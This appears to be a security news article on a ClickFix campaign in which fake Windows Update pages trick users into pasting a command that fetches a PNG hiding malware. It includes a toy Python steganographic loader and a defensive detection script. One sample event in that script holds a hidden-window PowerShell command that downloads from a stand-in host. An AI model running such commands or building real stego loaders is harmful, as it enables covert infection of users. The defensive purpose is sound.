Summary
- A full-screen fake Windows Update or "human verification" page tricks users into pasting and executing the attacker's command themselves.
- The malware is stored steganographically in the pixels of a PNG image; a .NET "Stego Loader" extracts it, decrypts it and runs it in memory.
- The clipboard trick is what gets the command onto the victim's machine; before running the real payload, the loader calls 10,000 empty functions to exhaust or stall analysis tools.
Social engineering is still one of the most common ways to infect a computer or steal someone's data, and a well-executed attack can have nasty consequences. This latest variant even dresses itself up as a Windows Update screen.
Cybersecurity researchers have discovered a new evolution of "ClickFix" social engineering attacks, in which attackers combine realistic fake Windows Update animations with a payload hidden in an image. If you don't know what a ClickFix attack is: rather than dropping a file automatically, which browsers and security software would block or flag, the page talks the user into running the attacker's command with their own hands. No browser vulnerability is exploited; the victim's keystrokes do the work.
In these new variants, victims are shown a full-screen browser page simulating a critical Windows security update or a "verify you are human" captcha. The page tells the user to press a specific key sequence (typically Win+R to open the Run box, Ctrl+V to paste, then Enter) to resolve an error or confirm their identity. Unbeknownst to the user, JavaScript on the malicious page has already written the attacker's command to the clipboard. When the user follows the instructions, pasting into the Windows Run box or a Command Prompt, they execute the attacker's code themselves.
It's actually quite clever, and that's what makes it scary. What sets this campaign apart is the use of steganography to hide the malware payload. Instead of downloading a recognizable malicious file, the attackers hide code inside the pixel data of PNG images. Huntress researchers explained that the malicious code is encoded directly into certain colour channels of the image, so the file still opens as an ordinary picture: to the casual observer or a routine security scan it looks like an innocuous image. The second half of the chain is a .NET assembly known as "Stego Loader". This loader parses the image, extracts the encrypted payload from the pixel values and decrypts it in memory, so the malware itself never sits on disk as a recognizable executable.
It works like this: you visit a website that displays a fake full-screen error, such as Windows Update appearing to hang or a "verify you are human" check. A background script on the site silently copies the malicious command to your clipboard. The screen tells you to open the Windows Run box and paste the text to "fix" the problem; once you press Enter, the command downloads a seemingly harmless image file that actually carries the malware, which the Stego Loader then extracts and decrypts. Before running the real payload, the loader's entry point calls 10,000 empty functions, a padding trick intended to exhaust or stall sandboxes and analysis tools.
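To make the steganographic half of the chain concrete, here is an added example (not the Huntress researchers' code or the real Stego Loader) that models what such a loader does: it writes a valid PNG whose payload is hidden in the lowest bit of the blue channel, then parses the PNG back, pulls the bytes out of the pixel values and decrypts them in memory. The minimal PNG writer/reader, the choice of the blue channel's low bit, the 4-byte length prefix and the SHA-256 keystream cipher are all assumptions made for the illustration; the real loader's channel layout and cipher are not described on this page.

```python
"""Toy model of a PNG stego loader (added example, not the real loader).

Hide an encrypted payload in the low bit of each pixel's blue value of a
PNG, then do what a loader would: parse the image, extract the hidden
bytes and decrypt them in memory. The image remains a valid, ordinary
picture, which is why file-type checks and casual inspection miss it."""
import hashlib
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


# ---- minimal PNG writer/reader: 8-bit RGB, no row filtering (assumed) ----
def _chunk(kind: bytes, body: bytes) -> bytes:
    crc = zlib.crc32(kind + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + kind + body + struct.pack(">I", crc)


def write_png(width: int, height: int, pixels: list) -> bytes:
    # each scanline starts with filter byte 0 ("None"), then R,G,B per pixel
    raw = b"".join(
        b"\x00" + bytes(c for px in pixels[y * width:(y + 1) * width] for c in px)
        for y in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b""))


def read_png(data: bytes):
    """Return (width, height, [(r, g, b), ...]) for an unfiltered 8-bit RGB PNG."""
    if data[:8] != PNG_SIGNATURE:
        raise ValueError("not a PNG")
    pos, width, height, idat = 8, 0, 0, b""
    while pos < len(data):
        length, kind = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        if kind == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", body[:10])
            if depth != 8 or ctype != 2:
                raise ValueError("only 8-bit RGB supported in this toy reader")
        elif kind == b"IDAT":
            idat += body
        pos += 12 + length  # length field + type + body + CRC
    raw = zlib.decompress(idat)
    stride = 1 + 3 * width
    pixels = []
    for y in range(height):
        row = raw[y * stride:(y + 1) * stride]
        if row[0] != 0:
            raise ValueError("filtered rows not supported in this toy reader")
        pixels.extend(tuple(row[1 + 3 * x:4 + 3 * x]) for x in range(width))
    return width, height, pixels


# ---- the steganography: one payload bit per pixel, in the blue LSB ----
def embed(pixels: list, payload: bytes) -> list:
    """Store a 4-byte big-endian length followed by the payload bytes."""
    bits = "".join(f"{b:08b}" for b in struct.pack(">I", len(payload)) + payload)
    if len(bits) > len(pixels):
        raise ValueError("cover image too small for payload")
    out = list(pixels)
    for i, bit in enumerate(bits):
        r, g, b = out[i]
        out[i] = (r, g, (b & 0xFE) | int(bit))  # only the lowest blue bit changes
    return out


def extract(pixels: list) -> bytes:
    def take(n_bytes: int, start: int) -> bytes:
        if n_bytes == 0:
            return b""
        bits = "".join(str(pixels[start + i][2] & 1) for i in range(8 * n_bytes))
        return int(bits, 2).to_bytes(n_bytes, "big")
    length = struct.unpack(">I", take(4, 0))[0]
    return take(length, 32)


# ---- stand-in cipher (assumption): XOR with a SHA-256 counter keystream ----
def keystream_xor(key: bytes, data: bytes) -> bytes:
    out = bytearray()
    for off in range(0, len(data), 32):
        ks = hashlib.sha256(key + struct.pack(">I", off // 32)).digest()
        out.extend(a ^ b for a, b in zip(data[off:off + 32], ks))
    return bytes(out)


def build_stego_png(payload: bytes, key: bytes, width: int = 64, height: int = 64) -> bytes:
    """Attacker side: constructed gradient cover image carrying the encrypted payload."""
    cover = [((x * 4) & 0xFF, (y * 4) & 0xFF, 128) for y in range(height) for x in range(width)]
    return write_png(width, height, embed(cover, keystream_xor(key, payload)))


def stego_loader(png_bytes: bytes, key: bytes) -> bytes:
    """Loader side: parse the image, pull bytes from the colour channel, decrypt in memory."""
    _, _, pixels = read_png(png_bytes)
    return keystream_xor(key, extract(pixels))


if __name__ == "__main__":
    key = b"demo-key"
    payload = b"<second stage bytes go here>"  # constructed stand-in, never executed
    png = build_stego_png(payload, key)
    print("valid PNG signature:", png[:8] == PNG_SIGNATURE)
    print("recovered:", stego_loader(png, key))
```

The point to take from running it: the carrier passes every cheap check (magic bytes, a successful decode, sane dimensions), and the hidden bytes are only a one-bit perturbation of colour values, so a scanner that does not statistically examine the low-order pixel bits has nothing to match on. That is also why the decrypt-in-memory step matters for defenders: the recognizable artefact only ever exists as a byte array inside the loader process.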
You or I probably wouldn't fall for this. But think about an elderly relative who lands on such a page after clicking the wrong link: a disaster waiting to happen. You can disable the Run box on your grandfather's computer (the "Remove Run menu from Start Menu" Group Policy), but that only removes one paste target; the same command works just as well in a Command Prompt or PowerShell window. Beyond that it comes down to awareness: Windows Update and captcha checks never ask you to open Run and paste something.
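Since disabling the Run box is only a partial fix, the check a defender would actually add is a detection on the other end: a shell spawned from Explorer (which is what the Run box and Start menu produce) whose command line fetches or decodes a remote stage. The following is an added example, not something from the article or from Huntress; the pipe-separated "Key=Value" log format, the sample events and the `example.invalid` hostname are constructed for the illustration, and the regexes are generic indicators rather than campaign-specific IOCs.

```python
"""Triage process-creation events for the ClickFix "paste into Run" pattern.

Added example over constructed log lines (not from the original article).
Rule: a shell whose parent is explorer.exe (Run box / Start menu launch)
and whose command line fetches or decodes something, or hides its window."""
import re

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# generic "download or decode a stage" verbs; not campaign-specific indicators
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|\bcurl\b|bitsadmin|frombase64string|https?://",
    re.I)
# flags that hide the console window or relax execution policy
HIDDEN_RE = re.compile(r"-w(?:in(?:dowstyle)?)?\s+hidden|-nop\b|-ep\s+bypass", re.I)

# constructed events in an assumed 'Key=Value|Key=Value' export format
EVENTS = [
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell -w hidden -nop -c '$b=(iwr http://example.invalid/update.png).Content'",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\notepad.exe"
    r"|CommandLine=notepad.exe C:\Users\u\notes.txt",
    r"ParentImage=C:\Program Files\Microsoft VS Code\Code.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell -c Get-ChildItem",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\cmd.exe"
    r"|CommandLine=cmd /c ipconfig /all",
]


def parse_event(line: str) -> dict:
    """Split the constructed 'Key=Value|...' line into a dict."""
    return dict(field.split("=", 1) for field in line.split("|"))


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def clickfix_indicators(ev: dict) -> list:
    """Return the reasons this event matches the pattern (empty list = benign)."""
    reasons = []
    if basename(ev.get("Image", "")) not in SHELLS:
        return reasons
    if basename(ev.get("ParentImage", "")) != "explorer.exe":
        return reasons  # Run box and Start menu launches have explorer.exe as parent
    cmd = ev.get("CommandLine", "")
    if DOWNLOAD_RE.search(cmd):
        reasons.append("shell from Explorer fetches or decodes a remote stage")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden window / execution-policy bypass flags")
    return reasons


def triage(lines) -> list:
    """Return [(command_line, reasons)] for every event that trips the rule."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        reasons = clickfix_indicators(ev)
        if reasons:
            hits.append((ev["CommandLine"], reasons))
    return hits


if __name__ == "__main__":
    for cmd, why in triage(EVENTS):
        print(cmd)
        for r in why:
            print("   -", r)
```

Note what the rule deliberately does not do: an explorer-parented `cmd /c ipconfig` is left alone, and a PowerShell launched by an editor is left alone even with download verbs. Keying on the parent rather than on the Run dialog specifically is what makes the check survive the "disable Run" mitigation being bypassed via a Command Prompt window.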
Source: Computer beeping